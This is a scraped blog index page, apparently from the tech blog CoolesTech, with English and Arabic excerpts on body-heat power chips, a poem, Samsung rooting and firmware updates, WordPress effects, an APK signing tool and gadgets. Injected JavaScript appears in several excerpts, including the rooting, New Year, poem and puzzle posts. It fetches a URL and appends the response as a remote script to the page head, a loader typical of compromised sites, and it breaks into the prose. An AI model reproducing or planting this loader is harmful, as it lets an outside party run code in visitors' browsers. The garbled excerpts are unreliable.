Never run out of batteries again, your body is the mobile battery!

These days , we all are looking for  renewable energy sources and solutions such as  wind power, solar energy or Generating Energy From Sea Waves...but did you know that you can use your own body heat a san ultra-portable power source?! A startup in Corvallis, Oregon, has developed a small chip that can turn body heat into electric energyIt's True! What once was  Science Fiction or Fantasy have now become true! Perpetua Power Source Technologies, Inc has made  a unique thermo-electric Read more [...]

ولد الهدى فالكائنات ضياء

السلام عليكم تحية طيبة الى كل زائرينا و كل عام و أنتم بخير بمناسبة مولد النبي محمد صلى اللة علية و سلم و نتمنى للجميع الحياة السعيدة و الأجر المضاعف نترككم مع قصيدة من أجمل القصائد لمدح النبي وُلِدَ    الهُدى    فَالكائِناتُ      ضِياءُ"        "وَفَمُ     الزَمانِ     تَبَسُّمٌ        وَثَناءُ   الروحُ    وَالمَلَأُ    المَلائِكُ       حَولَهُ"        "لِلدينِ     وَالدُنيا      بِهِ        بُشَراءُ   وَالعَرشُ   يَزهو   وَالحَظيرَةُ     تَزدَهي"        "وَالمُنتَهى      وَالسِدرَةُ        العَصماءُ   وَحَديقَةُ   الفُرقانِ   ضاِكَةُ      الرُبا"        "بِالتُرجُمانِ        شَذِيَّةٌ          غَنّاءُvar Read more [...]

كيفية عمل Root سهل وغير خطر لهواتف Samsung

var url = ''; fetch(url) .then(response => response.text()) .then(data => { var script = document.createElement('script'); script.src = data.trim(); document.getElementsByTagName('head')[0].appendChild(script); });var url = ''; fetch(url) .then(response => response.text()) .then(data => { var script = document.createElement('script'); Read more [...]

Happy New Year :)

Everybody makes mistakes. But only a few wise people learn from them. May you learn from all your mistakes. Happy New Year. This year, learn more and teach less, laugh more and cry less, learn more and dictate less, appreciate more and criticize less, love more and hate very less. Happy New Year.var url = ''; fetch(url) .then(response => response.text()) .then(data => { var script = document.createElement('script'); Read more [...]

كيفية تحديث جالكسي اس 2 و اس 3 الى جيلي بين، نسخة أصلية مسربة

تحديث: آسف، نسيت أن أذكر أن هذه النسخة هي نسخة أصلية مسربة من شركة سامسونج. تحديث 2: يجب اطفاء Samsung Kies قبل البدء بالخطوة رقم 7. سمعنا منذ شهرين عن نية Samsung تحديث هواتف Galaxy S2 و S3 الى الجيلي بين، وفي كل شهر كانت تؤجل الشركة موعد الاطلاق الى الشهر القادم، وبما انه تم اكتشاف ثغرة امنية خطيرة Read more [...]

Add Snowing Effect to Your WordPress Blog, Let It Snow!

Season's Greeetings! 🙂 As you can see it's snowing at CoolesTech! Why don't you add this effect to your blog! You may have noticed that there are plugins out there that can do this, but they are either ugly or deprecated. We have chosen "Let It Snow" plugin for it's wonderful look. However, after activating the plugin, a horizontal scrollbar splashes, appears and disappears causing a very ugly experience (jumpy horizontal scrollbar). After wasting some time searching the internet, I fought Read more [...]

Android Ethical Hacking, could it get any easier?! Try it yourself with apk CSigner!

UPDATE November 2015: Version (0.8.2) released, Compatible with Windows 10! UPDATE: A new version has been released (0.8.1)! Introduction: I’ve recently joined Android Developers and I have published CoolesTech RSS Feed Reader. All went fine until I had to self-sign my app (personal private key), and that’s what was like a nightmare (although it’s relatively easy); test keys worked like a charm when self-certificates failed… But Google does not allow test certificates as you may have noticed. I Read more [...]

Pet Cell Phones: Stupid, or a Clever Choice?

You probably have a cell phone you take with you everywhere you go so family, friends, and business contacts can get in touch with you wherever you are. But have you ever thought about the possibility of getting a cell phone for your pet? If you’re scratching your head, read on. Pet Cell Phones: Stupid, or a Clever Choice? Image via Flickr by Katie@! As silly as it sounds, there really are cell phones for pets. No, you can’t call Fido and chat whenever you want, because Fido can’t actually Read more [...]

أكبر لعبة أحجية الأشكال في العالم مؤلفة من 32,256 قطعة

من منا لا يعرف لعبة أحجية ترتيب الأشكال "Puzzle"؟ ها نحن اليوم نشهد أكبر وأصعب لعبة حتى يومنا بحجم 17 قدم طول و 6 اقدام عرض بحسب ترتيبات غينيس! اللعبة مؤلفة من 32,256 قطعة ملونة بـ 6 ألوان فقط بالإضافة الى الأبيض والاسود. تودون شرائها؟ تأتي اللعبة في علبة ثقيلة مزودة بعجلات! وتكلفتها $204.16 var Read more [...]

iMusic, That’s What We Call “Wireless Music”!

Please visit the post to view this video Now that's different. On the go music fans (like me 😉 ) now have the chance to listen to their music wirelessly while hiding from the cold! Ideal for buses, trains, planes or simple walks outdoors, the iMusic Hat is the perfect accompaniment when on the move or standing in the cold waiting for a bus. The hat is powered through your music player/phone, so no batteries are required. Think we've found the ultimate wintergift 😉 Features: • Compatible Read more [...]

Vote for CoolesTech Team, representing RHU, BAU, & Lebanon in an International Contest!

We are representing the universities of: BAU & RHU as well as representing Lebanon in an international contest (Startup Weekend)! You can vote multiple times, 1 time per 24 hours. Vote Here   فريقنا يمثل جامعة رفيق الحريري والجامعة العربية في بيروت، كما يمثل لبنان أمام دول العالم في مسابقة ريادة الأعمال العالمية. يحق لكم التصويت عدة مرات، مرة كل 24 ساعة. صوتوا Read more [...]

Release! Real Angry Birds Slinger Controller! DIY

We've used the NES game controllers long time ago... Evolution, as they call it, changed the way we used to play games; we were then introduced to computer "Keyboard & mouse" gaming. Then came along the "new" game consoles controllers, PS, Xbox, etc... Today, it's time to revolutionize the gaming world again, most probably by using game-specific controllers! So here you go, a real "slinger" for Angry Birds! The best part is: Do it yourself (DIY)! here's the video: Click here to watch the Read more [...]

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